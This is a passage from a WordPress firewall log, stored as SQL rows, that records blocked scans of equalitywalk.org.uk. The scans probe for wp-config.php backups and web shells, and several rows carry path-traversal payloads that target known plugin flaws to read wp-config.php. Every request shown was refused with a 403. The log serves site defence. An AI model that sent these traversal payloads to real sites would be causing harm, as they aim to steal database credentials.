Firefox\\/45.0\"}','PIwREbFyM3zvtcUY2T0Omdg5',0,1675016962.0338,92,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-config.php.sample','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','lxIASiOtPXc9yzY52rb3CBTH',0,1675016962.1848,111,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-config.php.save.1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','9yVBdJ7FqR3GbgLD0n2xhZ8U',0,1675016962.3519,96,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-config.php.stage','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','2sZfHxgWSmeoOJNp846thVqF',0,1675016962.5077,116,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-config.php.staging','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','OPQrgfZAyKIFxzqJ65WNHvnT',0,1675016962.6802,96,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-config.php.swn','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','equvxr892I5jPNWD6bCHflo4',0,1675016962.8319,116,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-config.php.tar','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','73nFqDNAcfy8meCRhbIx9wPs',0,1675016963.0039,147,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-config.php.temp','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','Poyat7Gp2YAiTgMcVCFheHkd',0,1675016963.2090,194,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-config.php.uk','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','YZQq2iuwIVmvHpgTCKE3tSWB',0,1675016963.4710,187,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-config.php.us','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','lTpjtbgFV9KDZnmoJRfx0Iry',0,1675016963.7200,142,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/mdocs-posts/?mdocs-img-preview=..%2F..%2F..%2Fwp-config.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','mfSBXGNgvkYLMA1TUPnldVR2',0,1675016966.7607,117,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp/wp-content/force-download.php?file=..%2Fwp-config.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','JcBG72C1z8mMlNfgvTQxdLRF',0,1675016967.2790,94,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/?mdocs-img-preview=..%2F..%2F..%2Fwp-config.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','ojOp390PnkWiN452heMYEtsK',0,1675016968.2930,93,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-includes/plugins/wp-mobile-detector/resize.php?src=..%2F..%2F..%2F..%2Fwp-config.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','D20b7fmX9QdZg8hcJwNGRKAv',0,1675016968.8806,104,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/?mdocs-img-preview=..%2F..%2F..-%2Fwp-config.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','26AhFWlIKoB8g0Nyn1GXDudY',0,1675016969.0769,95,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk//?action=cpis_init&cpis-action=f-download&purchase_id=1&cpis_user_email=i0SECLAB%40intermal.com&f=..%2F..%2F..%2F..%2Fwp-config.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','7NoecYiAulanDfsxRJ8TgrjE',0,1675016969.2203,87,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/?action=cpis_init&cpis-action=f-download&purchase_id=1&cpis_user_email=i0SECLAB%40intermal.com&f=..%2F..%2F..%2F..%2Fwp-config.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','m5EU36KvMYtif2k1lNzB4LQg',0,1675016969.8371,105,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-config.php.rpmnew','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','PoNg20Y75dmjRbnMS4JqlkZ6',0,1675016970.8584,164,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-e-commerce/wpsc-includes/misc.functions.php?image_name=..%2F..%2Fwp-config.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','Ra1osDZtUdqjlQ0vGE4u9SIy',0,1675016972.7395,125,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-config.php.disabled','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','1RVZ2Sz4wdjGAPN76cymFJUQ',0,1675016972.9231,131,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-config.php.8','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','z5fcP2XJ6iEtgrbRICTh4uyq',0,1675016973.1112,95,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-config.php.bak1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','9laQxJA65hVGYof1sRdMzurv',0,1675016973.3521,95,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wordpress/wp-config.php.backup','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','lMC4oOQZ03AtebrY9IESPDfN',0,1675016974.1475,107,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/force-download.php?file=..%2Fwp-config.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','UxIhiLSPMOtGFNlpfWQA3c6g',0,1675016974.5140,88,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp%E2%80%94admin/admin%E2%80%94ajax.php?action=duplicator_download&file=%2F..%2Fwp-config.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','97XkGfuYzKMFlEyp2gIr13tv',0,1675016975.4424,98,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/blog/wp-config.php.backup','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','gHrSxK06kaAj9Cyw7hGd3EFN',0,1675016977.5027,147,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp/wp-config.php.bak','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','jgOUq4l2bXWcBMwRS6KkoCu0',0,1675016977.8643,123,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-config.php.resetwp_bak','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','8TUkqSd6LQYhjXv1moZr0Iw9',0,1675016978.9501,95,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-config.php.public','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','o7XrENcz5HFJRpOm0Ak9iIZ3',0,1675016979.1135,94,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-config.php.info','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','eupOBLgxaA6fDTWXqc0ZHmVw',0,1675016979.2712,94,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-config.php.fr','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','Mgd5VyHRZGsClS8JqFK7eatI',0,1675016979.4322,105,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-config.php.de','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','cmLyhV1StbdE9U65ZYWTgiDR',0,1675016979.5936,96,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-config.php.ca','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','qBQ3O7VoKadbJkt4S86iymDA',0,1675016979.7629,133,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wordpress/wp-config.php.bak','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','iTb3VtQLSfwU9RpJO7oCaGYs',0,1675016979.9543,118,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/blog/wp-config.php.bak','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','ct9VBS7R3MkPiKWwZLzA5DUj',0,1675016980.6015,109,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/._wp-config.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','Tx5bNRXGvOVt2f9gkKq1ADyr',0,1675016981.6942,119,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/backup.wp-config.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','hfO3m0MAvx5Ltj6KbiV4aEYC',0,1675016982.6997,92,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-config%20-%20Copy.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','NXWqKYrgc7tuG8am0UEMiLCo',0,1675016982.8481,115,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-config.com','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','wmgGBN08ZVSijDoOaJAMst6p',0,1675016986.2053,87,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-config.php.bac','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','KGE4oUyhSNuv2cnP9sM0JzqZ',0,1675016989.8181,102,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-config.php.c','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','IwLAd9h5CFrRbWouP1q4zpfa',0,1675016989.9683,101,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-config.php.cache','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','iJw4GFdYM2oHplXCyh5sWg03',0,1675016990.1300,91,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-config.php.cfg','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','z7BuUCklDfZg61GnqixVNQwp',0,1675016990.2774,91,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-config.php.conf','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','KG8tBuSChb0F4a2Y16n5zqM3',0,1675016990.4247,99,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-config.php.cs','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','9RsndHGFWCiwTf2QPqKzomhO',0,1675016990.5930,103,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-config.php.csproj','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','fe5gJWl3ivRjDM0XSx1qZNrs',0,1675016990.7957,93,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-config.php.data','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','SaveVYoghWZpm4UwEXQqi7dO',0,1675016990.9509,96,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-config.php.dif','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','Rpr5LCJdZmnoGNakBQzSyYTD',0,1675016991.1040,97,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-config.php.err','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','1fMq49ne3VTGdAvHuDsrPoSC',0,1675016991.2573,93,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-config.php.html','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','DG2JdihCcmXp4Kjra5Rb07Uz',0,1675016991.4077,96,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-config.php.ini','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','89mBdjaGh2f3XVvHQyLoRJsM',0,1675016991.5603,93,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-config.php.java','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','XpfQv2KdCuNWI6PZOj873zAt',0,1675016991.7151,132,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-config.php.log','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','LuqMQ5tG7hW12wlHPCn4aoBX',0,1675016991.9126,107,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-config.php.lst','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','0bmIhWdavKc3wTApO4URxLND',0,1675016992.0756,94,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-config.php.map','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','VePnryFDB9XRCxpfc4E3JbvO',0,1675016992.2275,97,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-config.php.part','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','mZGfvhcAdJ40uUHMkOWDo3sL',0,1675016992.3802,93,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-config.php.rej','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','PS2xlbovhj8cJRsAEGW1zVwe',0,1675016992.5295,95,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-config.php.sass-cache','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','yws5N8FOXKprtS1ndaVxflYc',0,1675016992.6811,94,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-config.php.sav','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','kVu2PH4hRLC6dZcUTtEA9eD8',0,1675016992.8401,92,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-config.php.save.2','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','CnsOa06zxpy945Y1dioRTfhS',0,1675016993.0000,122,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-config.php.save.3','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','fZwBbCdUmyHptv1NGc7Wx34F',0,1675016993.1784,93,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-config.php.sublime-project','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','3ctNxSOMEQqinLV9RXoCz0dH',0,1675016993.3283,99,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-config.php.sublime-workspace','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','EJtOab9ciIR8SHqwBdPCMYr7',0,1675016993.4857,96,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-config.php.tar.gz','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','LChfgeyDatM1SQ8GoIHvz5Nb',0,1675016993.6562,92,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-config.php.un~','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','69StbDjU5G0JAfaMz87H23xW',0,1675016993.8090,130,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-config.php.vb','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','5EfuGxLbgqaA6sR3TNWFhSp9',0,1675016993.9966,124,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-config.php.vbproj','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','Hz4Gs9W6w7yon8AVqkrElTSu',0,1675016994.1767,92,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-config.php.vi','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','mQb6kCJfOoFcjpx0PAeNIvRh',0,1675016994.3252,93,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-config.php0','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','nI7BCsGRpmwMAo1Nl0aZjOK8',0,1675016994.4743,96,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-config.php3','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','K5HfV17r0kbt4IxROFzlDYio',0,1675016994.6299,133,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-config.php4','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','LYKGdUM8Fhp6vQoDgtIbzO0x',0,1675016994.8327,97,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-config.php5','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','a86Dib4xuWItoM3y2nXEc0AL',0,1675016994.9852,96,'','GET',403,0,700,0,1,'',0),('89.187.168.80',1505470544,'','https://www.equalitywalk.org.uk/wp-config.php6','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','LzT1qZN6ShIjAJGEQtl0bHXv',0,1675016995.1375,95,'','GET',403,0,700,0,1,'',0),('74.208.190.148',1255194260,'','https://www.equalitywalk.org.uk/wsoyanzorng.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','KHyWmEQe7hkbOl3zjgCFvSZo',0,1675027606.1163,110,'','GET',403,0,700,0,1,'',0),('74.208.190.148',1255194260,'','https://www.equalitywalk.org.uk/wp-includes/wsoyanzorng.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','cseOanX35ybPFfhd82m9QvB1',0,1675027658.1426,126,'','GET',403,0,700,0,1,'',0),('89.35.6.211',1495467731,'','https://equalitywalk.org.uk/wp-admin/maint/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit\\/533.4 (KHTML, like Gecko) Chrome\\/5.0.375.99 Safari\\/533.4\",\"2\":\"http:\\/\\/equalitywalk.org.uk\\/wp-admin\\/maint\\/index.php\"}','ChnWHye4bS5lgYAKzIPGsX6d',0,1675043565.7595,152,'','GET',403,0,700,0,1,'',0),('116.203.119.56',1959491384,'','https://equalitywalk.org.uk/wp-includes/shell20211028.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','rHesEwAjKQ3ZyCVOnlYg0BTN',0,1675044395.4576,231,'','GET',403,0,700,0,1,'',0),('116.203.119.56',1959491384,'','https://equalitywalk.org.uk/wp-includes/shell20211028.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','qcad1XxJKsrTHNQevwmGzLn5',0,1675044396.6881,166,'','GET',403,0,700,0,1,'',0),('116.203.119.56',1959491384,'','https://equalitywalk.org.uk/1index.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','T7rzWSifG45gtuYJDwVMpLn2',0,1675044397.8480,118,'','GET',403,0,700,0,1,'',0),('116.203.119.56',1959491384,'','https://equalitywalk.org.uk/1index.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','KUP0q5xtC4691ODYRJfyAmQ3',0,1675044399.1494,162,'','GET',403,0,700,0,1,'',0),('116.203.119.56',1959491384,'','https://www.equalitywalk.org.uk/wp-includes/shell20211028.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','JGrNWUiSpfjyIxwDEocbQv2T',0,1675047193.1528,324,'','GET',403,0,700,0,1,'',0),('116.203.119.56',1959491384,'','https://www.equalitywalk.org.uk/wp-includes/shell20211028.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','rHlNfWR5su2LXQ8MkOJzGDy0',0,1675047195.1724,179,'','GET',403,0,700,0,1,'',0),('116.203.119.56',1959491384,'','https://www.equalitywalk.org.uk/1index.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','vzejW6YT0H2I7pJaoFmE3ZOi',0,1675047197.2385,109,'','GET',403,0,700,0,1,'',0),('116.203.119.56',1959491384,'','https://www.equalitywalk.org.uk/1index.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie 